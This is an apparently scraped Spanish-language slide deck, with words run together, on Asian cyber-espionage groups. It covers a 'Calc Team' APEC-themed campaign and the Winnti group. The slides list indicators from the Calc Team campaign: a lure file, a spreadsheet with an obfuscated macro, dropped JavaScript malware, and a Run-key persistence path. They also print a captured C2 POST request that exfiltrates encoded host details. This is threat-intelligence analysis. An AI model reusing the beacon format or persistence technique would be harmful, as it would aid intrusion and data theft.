  • 32. Calc Team – Campanha 2 ▪ Noviembre2015,APEC ▪ BriefingPaperonthePresident'sScheduleduringtheAPEC LeadersMeeting.zip ▪ Hojadecalculo(.xls)conunmacroobfuscadoembebido. ▪ Escribe ▪ %TEMP%AELMEntertainmentbudgetandAttendanceallowance.xls ▪ %TEMP%1C234643A8A8.tmp–Scriptdelimpieza ▪ %TEMP%1C224643A8B8.js –MalwareenJS ▪ HKCUSoftwareMicrosoftWindowsCurrentVersionRun network
  • 33. Calc Team – Campanha 2
  • 34. Calc Team – Campanha 2
  • 35. Calc Team – Campanha 2
  • 36. Calc Team – Campanha 2 ▪ POST/common.phpHTTP/1.1 Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1; Trident/5.0) Referer:https://www.google.com Content-Length:248 Accept:*/* Host:presentation.twilightXXXXXX.com Connection:Keep-Alive action=aaa&data=NzQzMDFjYzNjOWVmOTBiNDIzZDdiNDI 0ZDI2NDNiMGZ8MTcyLjE2LjI1NS4yfFdJTFNPTk5FTEx ZfFdJTFNPTk5FTExZXEFkbWluaXN0cmF0b3IoYWRta W5pc3RyYXRvcil8TWljcm9zb2Z0IFdpbmRvd3MgWF AgUHJvZmVzc2lvbmFsfDE3Mi4xNi4yNTUuMTo4ODg 4fGpzbmVbMS40XSxpbXB0LHByfA%3D%3D
  • 37. Winnti Team ▪ Identificadoen2009 ▪ Susataqueshansidoenfocadosalaindustriadejuegos primariamentepararobarcertificadosdigitalesque permitansoportenactividadesdecyberespionajeaotros objetivos. ▪ Nexosconotrosgruposdeespionajeconloscuales compartecertificadosdigitales
  • 43. Conclusiones ▪ AdvancedPersistentThreat? ▪ ElCyberEsiponajecontinuaraimplementandocuanta tecnicapuedasiempreycuandoseaefectiva ▪ Gruposdeespionajeorientalesutilizanlainformacion recaudaparafortacelersuindustriainernamientrasque occidentetieneotrosfines. ▪ Sudamerica?Peru?